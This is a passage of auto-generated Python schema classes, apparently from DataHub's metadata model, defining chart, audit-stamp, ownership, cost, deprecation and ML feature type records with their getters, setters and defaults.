"""Setter: The instance on the server from which the event is being emitted. e.g. i001"""
self._inner_dict['instance'] = value
@property
def appName(self) -> str:
"""Getter: The name of the application from which the event is being emitted. see go/appname"""
return self._inner_dict.get('appName') # type: ignore
@appName.setter
def appName(self, value: str) -> None:
"""Setter: The name of the application from which the event is being emitted. see go/appname"""
self._inner_dict['appName'] = value
@property
def messageId(self) -> bytes:
"""Getter: A unique identifier for the message"""
return self._inner_dict.get('messageId') # type: ignore
@messageId.setter
def messageId(self, value: bytes) -> None:
"""Setter: A unique identifier for the message"""
self._inner_dict['messageId'] = value
@property
def auditVersion(self) -> Union[None, int]:
"""Getter: The version that is being used for auditing. In version 0, the audit trail buckets events into 10 minute audit windows based on the EventHeader timestamp. In version 1, the audit trail buckets events as follows: if the schema has an outer KafkaAuditHeader, use the outer audit header timestamp for bucketing; else if the EventHeader has an inner KafkaAuditHeader use that inner audit header's timestamp for bucketing"""
return self._inner_dict.get('auditVersion') # type: ignore
@auditVersion.setter
def auditVersion(self, value: Union[None, int]) -> None:
"""Setter: The version that is being used for auditing. In version 0, the audit trail buckets events into 10 minute audit windows based on the EventHeader timestamp. In version 1, the audit trail buckets events as follows: if the schema has an outer KafkaAuditHeader, use the outer audit header timestamp for bucketing; else if the EventHeader has an inner KafkaAuditHeader use that inner audit header's timestamp for bucketing"""
self._inner_dict['auditVersion'] = value
@property
def fabricUrn(self) -> Union[None, str]:
"""Getter: The fabricUrn of the host from which the event is being emitted. Fabric Urn in the format of urn:li:fabric:{fabric_name}. See go/fabric."""
return self._inner_dict.get('fabricUrn') # type: ignore
@fabricUrn.setter
def fabricUrn(self, value: Union[None, str]) -> None:
"""Setter: The fabricUrn of the host from which the event is being emitted. Fabric Urn in the format of urn:li:fabric:{fabric_name}. See go/fabric."""
self._inner_dict['fabricUrn'] = value
@property
def clusterConnectionString(self) -> Union[None, str]:
"""Getter: This is a String that the client uses to establish some kind of connection with the Kafka cluster. The exact format of it depends on specific versions of clients and brokers. This information could potentially identify the fabric and cluster with which the client is producing to or consuming from."""
return self._inner_dict.get('clusterConnectionString') # type: ignore
@clusterConnectionString.setter
def clusterConnectionString(self, value: Union[None, str]) -> None:
"""Setter: This is a String that the client uses to establish some kind of connection with the Kafka cluster. The exact format of it depends on specific versions of clients and brokers. This information could potentially identify the fabric and cluster with which the client is producing to or consuming from."""
self._inner_dict['clusterConnectionString'] = value
class ChartInfoClass(DictWrapper):
"""Information about a chart"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.chart.ChartInfo")
def __init__(self,
title: str,
description: str,
lastModified: "ChangeAuditStampsClass",
customProperties: Optional[Dict[str, str]]=None,
externalUrl: Union[None, str]=None,
chartUrl: Union[None, str]=None,
inputs: Union[None, List[str]]=None,
type: Union[None, Union[str, "ChartTypeClass"]]=None,
access: Union[None, Union[str, "AccessLevelClass"]]=None,
lastRefreshed: Union[None, int]=None,
):
super().__init__()
if customProperties is None:
# default: {}
self.customProperties = dict()
else:
self.customProperties = customProperties
self.externalUrl = externalUrl
self.title = title
self.description = description
self.lastModified = lastModified
self.chartUrl = chartUrl
self.inputs = inputs
self.type = type
self.access = access
self.lastRefreshed = lastRefreshed
@classmethod
def construct_with_defaults(cls) -> "ChartInfoClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.customProperties = dict()
self.externalUrl = self.RECORD_SCHEMA.field_map["externalUrl"].default
self.title = str()
self.description = str()
self.lastModified = ChangeAuditStampsClass.construct_with_defaults()
self.chartUrl = self.RECORD_SCHEMA.field_map["chartUrl"].default
self.inputs = self.RECORD_SCHEMA.field_map["inputs"].default
self.type = self.RECORD_SCHEMA.field_map["type"].default
self.access = self.RECORD_SCHEMA.field_map["access"].default
self.lastRefreshed = self.RECORD_SCHEMA.field_map["lastRefreshed"].default
@property
def customProperties(self) -> Dict[str, str]:
"""Getter: Custom property bag."""
return self._inner_dict.get('customProperties') # type: ignore
@customProperties.setter
def customProperties(self, value: Dict[str, str]) -> None:
"""Setter: Custom property bag."""
self._inner_dict['customProperties'] = value
@property
def externalUrl(self) -> Union[None, str]:
"""Getter: URL where the reference exist"""
return self._inner_dict.get('externalUrl') # type: ignore
@externalUrl.setter
def externalUrl(self, value: Union[None, str]) -> None:
"""Setter: URL where the reference exist"""
self._inner_dict['externalUrl'] = value
@property
def title(self) -> str:
"""Getter: Title of the chart"""
return self._inner_dict.get('title') # type: ignore
@title.setter
def title(self, value: str) -> None:
"""Setter: Title of the chart"""
self._inner_dict['title'] = value
@property
def description(self) -> str:
"""Getter: Detailed description about the chart"""
return self._inner_dict.get('description') # type: ignore
@description.setter
def description(self, value: str) -> None:
"""Setter: Detailed description about the chart"""
self._inner_dict['description'] = value
@property
def lastModified(self) -> "ChangeAuditStampsClass":
"""Getter: Captures information about who created/last modified/deleted this chart and when"""
return self._inner_dict.get('lastModified') # type: ignore
@lastModified.setter
def lastModified(self, value: "ChangeAuditStampsClass") -> None:
"""Setter: Captures information about who created/last modified/deleted this chart and when"""
self._inner_dict['lastModified'] = value
@property
def chartUrl(self) -> Union[None, str]:
"""Getter: URL for the chart. This could be used as an external link on DataHub to allow users access/view the chart"""
return self._inner_dict.get('chartUrl') # type: ignore
@chartUrl.setter
def chartUrl(self, value: Union[None, str]) -> None:
"""Setter: URL for the chart. This could be used as an external link on DataHub to allow users access/view the chart"""
self._inner_dict['chartUrl'] = value
@property
def inputs(self) -> Union[None, List[str]]:
"""Getter: Data sources for the chart"""
return self._inner_dict.get('inputs') # type: ignore
@inputs.setter
def inputs(self, value: Union[None, List[str]]) -> None:
"""Setter: Data sources for the chart"""
self._inner_dict['inputs'] = value
@property
def type(self) -> Union[None, Union[str, "ChartTypeClass"]]:
"""Getter: Type of the chart"""
return self._inner_dict.get('type') # type: ignore
@type.setter
def type(self, value: Union[None, Union[str, "ChartTypeClass"]]) -> None:
"""Setter: Type of the chart"""
self._inner_dict['type'] = value
@property
def access(self) -> Union[None, Union[str, "AccessLevelClass"]]:
"""Getter: Access level for the chart"""
return self._inner_dict.get('access') # type: ignore
@access.setter
def access(self, value: Union[None, Union[str, "AccessLevelClass"]]) -> None:
"""Setter: Access level for the chart"""
self._inner_dict['access'] = value
@property
def lastRefreshed(self) -> Union[None, int]:
"""Getter: The time when this chart last refreshed"""
return self._inner_dict.get('lastRefreshed') # type: ignore
@lastRefreshed.setter
def lastRefreshed(self, value: Union[None, int]) -> None:
"""Setter: The time when this chart last refreshed"""
self._inner_dict['lastRefreshed'] = value
class ChartQueryClass(DictWrapper):
"""Information for chart query which is used for getting data of the chart"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.chart.ChartQuery")
def __init__(self,
rawQuery: str,
type: Union[str, "ChartQueryTypeClass"],
):
super().__init__()
self.rawQuery = rawQuery
self.type = type
@classmethod
def construct_with_defaults(cls) -> "ChartQueryClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.rawQuery = str()
self.type = ChartQueryTypeClass.LOOKML
@property
def rawQuery(self) -> str:
"""Getter: Raw query to build a chart from input datasets"""
return self._inner_dict.get('rawQuery') # type: ignore
@rawQuery.setter
def rawQuery(self, value: str) -> None:
"""Setter: Raw query to build a chart from input datasets"""
self._inner_dict['rawQuery'] = value
@property
def type(self) -> Union[str, "ChartQueryTypeClass"]:
"""Getter: Chart query type"""
return self._inner_dict.get('type') # type: ignore
@type.setter
def type(self, value: Union[str, "ChartQueryTypeClass"]) -> None:
"""Setter: Chart query type"""
self._inner_dict['type'] = value
class ChartQueryTypeClass(object):
# No docs available.
"""LookML queries"""
LOOKML = "LOOKML"
"""SQL type queries"""
SQL = "SQL"
class ChartTypeClass(object):
"""The various types of charts"""
"""Chart showing a Bar chart"""
BAR = "BAR"
"""Chart showing a Pie chart"""
PIE = "PIE"
"""Chart showing a Scatter plot"""
SCATTER = "SCATTER"
"""Chart showing a table"""
TABLE = "TABLE"
"""Chart showing Markdown formatted text"""
TEXT = "TEXT"
LINE = "LINE"
AREA = "AREA"
HISTOGRAM = "HISTOGRAM"
BOX_PLOT = "BOX_PLOT"
class EditableChartPropertiesClass(DictWrapper):
"""Stores editable changes made to properties. This separates changes made from
ingestion pipelines and edits in the UI to avoid accidental overwrites of user-provided data by ingestion pipelines"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.chart.EditableChartProperties")
def __init__(self,
created: Optional["AuditStampClass"]=None,
lastModified: Optional["AuditStampClass"]=None,
deleted: Union[None, "AuditStampClass"]=None,
description: Union[None, str]=None,
):
super().__init__()
if created is None:
# default: {'actor': 'urn:li:corpuser:unknown', 'impersonator': None, 'time': 0}
self.created = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["created"].default, writers_schema=self.RECORD_SCHEMA.field_map["created"].type)
else:
self.created = created
if lastModified is None:
# default: {'actor': 'urn:li:corpuser:unknown', 'impersonator': None, 'time': 0}
self.lastModified = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["lastModified"].default, writers_schema=self.RECORD_SCHEMA.field_map["lastModified"].type)
else:
self.lastModified = lastModified
self.deleted = deleted
self.description = description
@classmethod
def construct_with_defaults(cls) -> "EditableChartPropertiesClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.created = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["created"].default, writers_schema=self.RECORD_SCHEMA.field_map["created"].type)
self.lastModified = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["lastModified"].default, writers_schema=self.RECORD_SCHEMA.field_map["lastModified"].type)
self.deleted = self.RECORD_SCHEMA.field_map["deleted"].default
self.description = self.RECORD_SCHEMA.field_map["description"].default
@property
def created(self) -> "AuditStampClass":
"""Getter: An AuditStamp corresponding to the creation of this resource/association/sub-resource. A value of 0 for time indicates missing data."""
return self._inner_dict.get('created') # type: ignore
@created.setter
def created(self, value: "AuditStampClass") -> None:
"""Setter: An AuditStamp corresponding to the creation of this resource/association/sub-resource. A value of 0 for time indicates missing data."""
self._inner_dict['created'] = value
@property
def lastModified(self) -> "AuditStampClass":
"""Getter: An AuditStamp corresponding to the last modification of this resource/association/sub-resource. If no modification has happened since creation, lastModified should be the same as created. A value of 0 for time indicates missing data."""
return self._inner_dict.get('lastModified') # type: ignore
@lastModified.setter
def lastModified(self, value: "AuditStampClass") -> None:
"""Setter: An AuditStamp corresponding to the last modification of this resource/association/sub-resource. If no modification has happened since creation, lastModified should be the same as created. A value of 0 for time indicates missing data."""
self._inner_dict['lastModified'] = value
@property
def deleted(self) -> Union[None, "AuditStampClass"]:
"""Getter: An AuditStamp corresponding to the deletion of this resource/association/sub-resource. Logically, deleted MUST have a later timestamp than creation. It may or may not have the same time as lastModified depending upon the resource/association/sub-resource semantics."""
return self._inner_dict.get('deleted') # type: ignore
@deleted.setter
def deleted(self, value: Union[None, "AuditStampClass"]) -> None:
"""Setter: An AuditStamp corresponding to the deletion of this resource/association/sub-resource. Logically, deleted MUST have a later timestamp than creation. It may or may not have the same time as lastModified depending upon the resource/association/sub-resource semantics."""
self._inner_dict['deleted'] = value
@property
def description(self) -> Union[None, str]:
"""Getter: Edited documentation of the chart """
return self._inner_dict.get('description') # type: ignore
@description.setter
def description(self, value: Union[None, str]) -> None:
"""Setter: Edited documentation of the chart """
self._inner_dict['description'] = value
class AccessLevelClass(object):
"""The various access levels"""
"""Publicly available access level"""
PUBLIC = "PUBLIC"
"""Private availability to certain set of users"""
PRIVATE = "PRIVATE"
class AuditStampClass(DictWrapper):
"""Data captured on a resource/association/sub-resource level giving insight into when that resource/association/sub-resource moved into a particular lifecycle stage, and who acted to move it into that specific lifecycle stage."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.common.AuditStamp")
def __init__(self,
time: int,
actor: str,
impersonator: Union[None, str]=None,
):
super().__init__()
self.time = time
self.actor = actor
self.impersonator = impersonator
@classmethod
def construct_with_defaults(cls) -> "AuditStampClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.time = int()
self.actor = str()
self.impersonator = self.RECORD_SCHEMA.field_map["impersonator"].default
@property
def time(self) -> int:
"""Getter: When did the resource/association/sub-resource move into the specific lifecycle stage represented by this AuditEvent."""
return self._inner_dict.get('time') # type: ignore
@time.setter
def time(self, value: int) -> None:
"""Setter: When did the resource/association/sub-resource move into the specific lifecycle stage represented by this AuditEvent."""
self._inner_dict['time'] = value
@property
def actor(self) -> str:
"""Getter: The entity (e.g. a member URN) which will be credited for moving the resource/association/sub-resource into the specific lifecycle stage. It is also the one used to authorize the change."""
return self._inner_dict.get('actor') # type: ignore
@actor.setter
def actor(self, value: str) -> None:
"""Setter: The entity (e.g. a member URN) which will be credited for moving the resource/association/sub-resource into the specific lifecycle stage. It is also the one used to authorize the change."""
self._inner_dict['actor'] = value
@property
def impersonator(self) -> Union[None, str]:
"""Getter: The entity (e.g. a service URN) which performs the change on behalf of the Actor and must be authorized to act as the Actor."""
return self._inner_dict.get('impersonator') # type: ignore
@impersonator.setter
def impersonator(self, value: Union[None, str]) -> None:
"""Setter: The entity (e.g. a service URN) which performs the change on behalf of the Actor and must be authorized to act as the Actor."""
self._inner_dict['impersonator'] = value
class BrowsePathsClass(DictWrapper):
"""Shared aspect containing Browse Paths to be indexed for an entity."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.common.BrowsePaths")
def __init__(self,
paths: List[str],
):
super().__init__()
self.paths = paths
@classmethod
def construct_with_defaults(cls) -> "BrowsePathsClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.paths = list()
@property
def paths(self) -> List[str]:
"""Getter: A list of valid browse paths for the entity.
Browse paths are expected to be backslash-separated strings. For example: 'prod/snowflake/datasetName'"""
return self._inner_dict.get('paths') # type: ignore
@paths.setter
def paths(self, value: List[str]) -> None:
"""Setter: A list of valid browse paths for the entity.
Browse paths are expected to be backslash-separated strings. For example: 'prod/snowflake/datasetName'"""
self._inner_dict['paths'] = value
class ChangeAuditStampsClass(DictWrapper):
"""Data captured on a resource/association/sub-resource level giving insight into when that resource/association/sub-resource moved into various lifecycle stages, and who acted to move it into those lifecycle stages. The recommended best practice is to include this record in your record schema, and annotate its fields as @readOnly in your resource. See https://github.com/linkedin/rest.li/wiki/Validation-in-Rest.li#restli-validation-annotations"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.common.ChangeAuditStamps")
def __init__(self,
created: Optional["AuditStampClass"]=None,
lastModified: Optional["AuditStampClass"]=None,
deleted: Union[None, "AuditStampClass"]=None,
):
super().__init__()
if created is None:
# default: {'actor': 'urn:li:corpuser:unknown', 'impersonator': None, 'time': 0}
self.created = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["created"].default, writers_schema=self.RECORD_SCHEMA.field_map["created"].type)
else:
self.created = created
if lastModified is None:
# default: {'actor': 'urn:li:corpuser:unknown', 'impersonator': None, 'time': 0}
self.lastModified = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["lastModified"].default, writers_schema=self.RECORD_SCHEMA.field_map["lastModified"].type)
else:
self.lastModified = lastModified
self.deleted = deleted
@classmethod
def construct_with_defaults(cls) -> "ChangeAuditStampsClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.created = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["created"].default, writers_schema=self.RECORD_SCHEMA.field_map["created"].type)
self.lastModified = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["lastModified"].default, writers_schema=self.RECORD_SCHEMA.field_map["lastModified"].type)
self.deleted = self.RECORD_SCHEMA.field_map["deleted"].default
@property
def created(self) -> "AuditStampClass":
"""Getter: An AuditStamp corresponding to the creation of this resource/association/sub-resource. A value of 0 for time indicates missing data."""
return self._inner_dict.get('created') # type: ignore
@created.setter
def created(self, value: "AuditStampClass") -> None:
"""Setter: An AuditStamp corresponding to the creation of this resource/association/sub-resource. A value of 0 for time indicates missing data."""
self._inner_dict['created'] = value
@property
def lastModified(self) -> "AuditStampClass":
"""Getter: An AuditStamp corresponding to the last modification of this resource/association/sub-resource. If no modification has happened since creation, lastModified should be the same as created. A value of 0 for time indicates missing data."""
return self._inner_dict.get('lastModified') # type: ignore
@lastModified.setter
def lastModified(self, value: "AuditStampClass") -> None:
"""Setter: An AuditStamp corresponding to the last modification of this resource/association/sub-resource. If no modification has happened since creation, lastModified should be the same as created. A value of 0 for time indicates missing data."""
self._inner_dict['lastModified'] = value
@property
def deleted(self) -> Union[None, "AuditStampClass"]:
"""Getter: An AuditStamp corresponding to the deletion of this resource/association/sub-resource. Logically, deleted MUST have a later timestamp than creation. It may or may not have the same time as lastModified depending upon the resource/association/sub-resource semantics."""
return self._inner_dict.get('deleted') # type: ignore
@deleted.setter
def deleted(self, value: Union[None, "AuditStampClass"]) -> None:
"""Setter: An AuditStamp corresponding to the deletion of this resource/association/sub-resource. Logically, deleted MUST have a later timestamp than creation. It may or may not have the same time as lastModified depending upon the resource/association/sub-resource semantics."""
self._inner_dict['deleted'] = value
class CostClass(DictWrapper):
# No docs available.
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.common.Cost")
def __init__(self,
costType: Union[str, "CostTypeClass"],
cost: "CostCostClass",
):
super().__init__()
self.costType = costType
self.cost = cost
@classmethod
def construct_with_defaults(cls) -> "CostClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.costType = CostTypeClass.ORG_COST_TYPE
self.cost = CostCostClass.construct_with_defaults()
@property
def costType(self) -> Union[str, "CostTypeClass"]:
# No docs available.
return self._inner_dict.get('costType') # type: ignore
@costType.setter
def costType(self, value: Union[str, "CostTypeClass"]) -> None:
# No docs available.
self._inner_dict['costType'] = value
@property
def cost(self) -> "CostCostClass":
# No docs available.
return self._inner_dict.get('cost') # type: ignore
@cost.setter
def cost(self, value: "CostCostClass") -> None:
# No docs available.
self._inner_dict['cost'] = value
class CostCostClass(DictWrapper):
# No docs available.
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.common.CostCost")
def __init__(self,
fieldDiscriminator: Union[str, "CostCostDiscriminatorClass"],
costId: Union[None, float]=None,
costCode: Union[None, str]=None,
):
super().__init__()
self.costId = costId
self.costCode = costCode
self.fieldDiscriminator = fieldDiscriminator
@classmethod
def construct_with_defaults(cls) -> "CostCostClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.costId = self.RECORD_SCHEMA.field_map["costId"].default
self.costCode = self.RECORD_SCHEMA.field_map["costCode"].default
self.fieldDiscriminator = CostCostDiscriminatorClass.costId
@property
def costId(self) -> Union[None, float]:
# No docs available.
return self._inner_dict.get('costId') # type: ignore
@costId.setter
def costId(self, value: Union[None, float]) -> None:
# No docs available.
self._inner_dict['costId'] = value
@property
def costCode(self) -> Union[None, str]:
# No docs available.
return self._inner_dict.get('costCode') # type: ignore
@costCode.setter
def costCode(self, value: Union[None, str]) -> None:
# No docs available.
self._inner_dict['costCode'] = value
@property
def fieldDiscriminator(self) -> Union[str, "CostCostDiscriminatorClass"]:
"""Getter: Contains the name of the field that has its value set."""
return self._inner_dict.get('fieldDiscriminator') # type: ignore
@fieldDiscriminator.setter
def fieldDiscriminator(self, value: Union[str, "CostCostDiscriminatorClass"]) -> None:
"""Setter: Contains the name of the field that has its value set."""
self._inner_dict['fieldDiscriminator'] = value
class CostCostDiscriminatorClass(object):
# No docs available.
costId = "costId"
costCode = "costCode"
class CostTypeClass(object):
"""Type of Cost Code"""
"""Org Cost Type to which the Cost of this entity should be attributed to"""
ORG_COST_TYPE = "ORG_COST_TYPE"
class DeprecationClass(DictWrapper):
"""Deprecation status of an entity"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.common.Deprecation")
def __init__(self,
deprecated: bool,
note: str,
actor: str,
decommissionTime: Union[None, int]=None,
):
super().__init__()
self.deprecated = deprecated
self.decommissionTime = decommissionTime
self.note = note
self.actor = actor
@classmethod
def construct_with_defaults(cls) -> "DeprecationClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.deprecated = bool()
self.decommissionTime = self.RECORD_SCHEMA.field_map["decommissionTime"].default
self.note = str()
self.actor = str()
@property
def deprecated(self) -> bool:
"""Getter: Whether the entity is deprecated."""
return self._inner_dict.get('deprecated') # type: ignore
@deprecated.setter
def deprecated(self, value: bool) -> None:
"""Setter: Whether the entity is deprecated."""
self._inner_dict['deprecated'] = value
@property
def decommissionTime(self) -> Union[None, int]:
"""Getter: The time user plan to decommission this entity."""
return self._inner_dict.get('decommissionTime') # type: ignore
@decommissionTime.setter
def decommissionTime(self, value: Union[None, int]) -> None:
"""Setter: The time user plan to decommission this entity."""
self._inner_dict['decommissionTime'] = value
@property
def note(self) -> str:
"""Getter: Additional information about the entity deprecation plan, such as the wiki, doc, RB."""
return self._inner_dict.get('note') # type: ignore
@note.setter
def note(self, value: str) -> None:
"""Setter: Additional information about the entity deprecation plan, such as the wiki, doc, RB."""
self._inner_dict['note'] = value
@property
def actor(self) -> str:
"""Getter: The corpuser URN which will be credited for modifying this deprecation content."""
return self._inner_dict.get('actor') # type: ignore
@actor.setter
def actor(self, value: str) -> None:
"""Setter: The corpuser URN which will be credited for modifying this deprecation content."""
self._inner_dict['actor'] = value
class FabricTypeClass(object):
"""Fabric group type"""
"""Designates development fabrics"""
DEV = "DEV"
"""Designates early-integration (staging) fabrics"""
EI = "EI"
"""Designates production fabrics"""
PROD = "PROD"
"""Designates corporation fabrics"""
CORP = "CORP"
class GlobalTagsClass(DictWrapper):
"""Tag aspect used for applying tags to an entity"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.common.GlobalTags")
def __init__(self,
tags: List["TagAssociationClass"],
):
super().__init__()
self.tags = tags
@classmethod
def construct_with_defaults(cls) -> "GlobalTagsClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.tags = list()
@property
def tags(self) -> List["TagAssociationClass"]:
"""Getter: Tags associated with a given entity"""
return self._inner_dict.get('tags') # type: ignore
@tags.setter
def tags(self, value: List["TagAssociationClass"]) -> None:
"""Setter: Tags associated with a given entity"""
self._inner_dict['tags'] = value
class GlossaryTermAssociationClass(DictWrapper):
"""Properties of an applied glossary term."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.common.GlossaryTermAssociation")
def __init__(self,
urn: str,
):
super().__init__()
self.urn = urn
@classmethod
def construct_with_defaults(cls) -> "GlossaryTermAssociationClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.urn = str()
@property
def urn(self) -> str:
"""Getter: Urn of the applied glossary term"""
return self._inner_dict.get('urn') # type: ignore
@urn.setter
def urn(self, value: str) -> None:
"""Setter: Urn of the applied glossary term"""
self._inner_dict['urn'] = value
class GlossaryTermsClass(DictWrapper):
"""Related business terms information"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.common.GlossaryTerms")
def __init__(self,
terms: List["GlossaryTermAssociationClass"],
auditStamp: "AuditStampClass",
):
super().__init__()
self.terms = terms
self.auditStamp = auditStamp
@classmethod
def construct_with_defaults(cls) -> "GlossaryTermsClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.terms = list()
self.auditStamp = AuditStampClass.construct_with_defaults()
@property
def terms(self) -> List["GlossaryTermAssociationClass"]:
"""Getter: The related business terms"""
return self._inner_dict.get('terms') # type: ignore
@terms.setter
def terms(self, value: List["GlossaryTermAssociationClass"]) -> None:
"""Setter: The related business terms"""
self._inner_dict['terms'] = value
@property
def auditStamp(self) -> "AuditStampClass":
"""Getter: Audit stamp containing who reported the related business term"""
return self._inner_dict.get('auditStamp') # type: ignore
@auditStamp.setter
def auditStamp(self, value: "AuditStampClass") -> None:
"""Setter: Audit stamp containing who reported the related business term"""
self._inner_dict['auditStamp'] = value
class InstitutionalMemoryClass(DictWrapper):
"""Institutional memory of an entity. This is a way to link to relevant documentation and provide description of the documentation. Institutional or tribal knowledge is very important for users to leverage the entity."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.common.InstitutionalMemory")
def __init__(self,
elements: List["InstitutionalMemoryMetadataClass"],
):
super().__init__()
self.elements = elements
@classmethod
def construct_with_defaults(cls) -> "InstitutionalMemoryClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.elements = list()
@property
def elements(self) -> List["InstitutionalMemoryMetadataClass"]:
"""Getter: List of records that represent institutional memory of an entity. Each record consists of a link, description, creator and timestamps associated with that record."""
return self._inner_dict.get('elements') # type: ignore
@elements.setter
def elements(self, value: List["InstitutionalMemoryMetadataClass"]) -> None:
"""Setter: List of records that represent institutional memory of an entity. Each record consists of a link, description, creator and timestamps associated with that record."""
self._inner_dict['elements'] = value
class InstitutionalMemoryMetadataClass(DictWrapper):
"""Metadata corresponding to a record of institutional memory."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.common.InstitutionalMemoryMetadata")
def __init__(self,
url: str,
description: str,
createStamp: "AuditStampClass",
):
super().__init__()
self.url = url
self.description = description
self.createStamp = createStamp
@classmethod
def construct_with_defaults(cls) -> "InstitutionalMemoryMetadataClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.url = str()
self.description = str()
self.createStamp = AuditStampClass.construct_with_defaults()
@property
def url(self) -> str:
"""Getter: Link to an engineering design document or a wiki page."""
return self._inner_dict.get('url') # type: ignore
@url.setter
def url(self, value: str) -> None:
"""Setter: Link to an engineering design document or a wiki page."""
self._inner_dict['url'] = value
@property
def description(self) -> str:
"""Getter: Description of the link."""
return self._inner_dict.get('description') # type: ignore
@description.setter
def description(self, value: str) -> None:
"""Setter: Description of the link."""
self._inner_dict['description'] = value
@property
def createStamp(self) -> "AuditStampClass":
"""Getter: Audit stamp associated with creation of this record"""
return self._inner_dict.get('createStamp') # type: ignore
@createStamp.setter
def createStamp(self, value: "AuditStampClass") -> None:
"""Setter: Audit stamp associated with creation of this record"""
self._inner_dict['createStamp'] = value
class MLFeatureDataTypeClass(object):
"""MLFeature Data Type"""
"""Useless data is unique, discrete data with no potential relationship with the outcome variable.
A useless feature has high cardinality. An example would be bank account numbers that were generated randomly."""
USELESS = "USELESS"
"""Nominal data is made of discrete values with no numerical relationship between the different categories — mean and median are meaningless.
Animal species is one example. For example, pig is not higher than bird and lower than fish."""
NOMINAL = "NOMINAL"
"""Ordinal data are discrete integers that can be ranked or sorted.
For example, the distance between first and second may not be the same as the distance between second and third."""
ORDINAL = "ORDINAL"
"""Binary data is discrete data that can be in only one of two categories — either yes or no, 1 or 0, off or on, etc"""
BINARY = "BINARY"
"""Count data is discrete whole number data — no negative numbers here.
Count data often has many small values, such as zero and one."""
COUNT = "COUNT"
"""Time data is a cyclical, repeating continuous form of data.
The relevant time features can be any period— daily, weekly, monthly, annual, etc."""
TIME = "TIME"
"""Interval data has equal spaces between the numbers and does not represent a temporal pattern.
Examples include percentages, temperatures, and income."""
INTERVAL = "INTERVAL"
"""Image Data"""
IMAGE = "IMAGE"
"""Video Data"""
VIDEO = "VIDEO"
"""Audio Data"""
AUDIO = "AUDIO"
"""Text Data"""
TEXT = "TEXT"
"""Mapping Data Type ex: dict, map"""
MAP = "MAP"
"""Sequence Data Type ex: list, tuple, range"""
SEQUENCE = "SEQUENCE"
"""Set Data Type ex: set, frozenset"""
SET = "SET"
"""Continuous data are made of uncountable values, often the result of a measurement such as height, weight, age etc."""
CONTINUOUS = "CONTINUOUS"
"""Bytes data are binary-encoded values that can represent complex objects."""
BYTE = "BYTE"
"""Unknown data are data that we don't know the type for."""
UNKNOWN = "UNKNOWN"
class OwnerClass(DictWrapper):
"""Ownership information"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.common.Owner")
def __init__(self,
owner: str,
type: Union[str, "OwnershipTypeClass"],
source: Union[None, "OwnershipSourceClass"]=None,
):
super().__init__()
self.owner = owner
self.type = type
self.source = source
@classmethod
def construct_with_defaults(cls) -> "OwnerClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.owner = str()
self.type = OwnershipTypeClass.DEVELOPER
self.source = self.RECORD_SCHEMA.field_map["source"].default
@property
def owner(self) -> str:
"""Getter: Owner URN, e.g. urn:li:corpuser:ldap, urn:li:corpGroup:group_name, and urn:li:multiProduct:mp_name
(Caveat: only corpuser is currently supported in the frontend.)"""
return self._inner_dict.get('owner') # type: ignore
@owner.setter
def owner(self, value: str) -> None:
"""Setter: Owner URN, e.g. urn:li:corpuser:ldap, urn:li:corpGroup:group_name, and urn:li:multiProduct:mp_name
(Caveat: only corpuser is currently supported in the frontend.)"""
self._inner_dict['owner'] = value
@property
def type(self) -> Union[str, "OwnershipTypeClass"]:
"""Getter: The type of the ownership"""
return self._inner_dict.get('type') # type: ignore
@type.setter
def type(self, value: Union[str, "OwnershipTypeClass"]) -> None:
"""Setter: The type of the ownership"""
self._inner_dict['type'] = value
@property
def source(self) -> Union[None, "OwnershipSourceClass"]:
"""Getter: Source information for the ownership"""
return self._inner_dict.get('source') # type: ignore
@source.setter
def source(self, value: Union[None, "OwnershipSourceClass"]) -> None:
"""Setter: Source information for the ownership"""
self._inner_dict['source'] = value
class OwnershipClass(DictWrapper):
"""Ownership information of an entity."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.common.Ownership")
def __init__(self,
owners: List["OwnerClass"],
lastModified: Optional["AuditStampClass"]=None,
):
super().__init__()
self.owners = owners
if lastModified is None:
# default: {'actor': 'urn:li:corpuser:unknown', 'impersonator': None, 'time': 0}
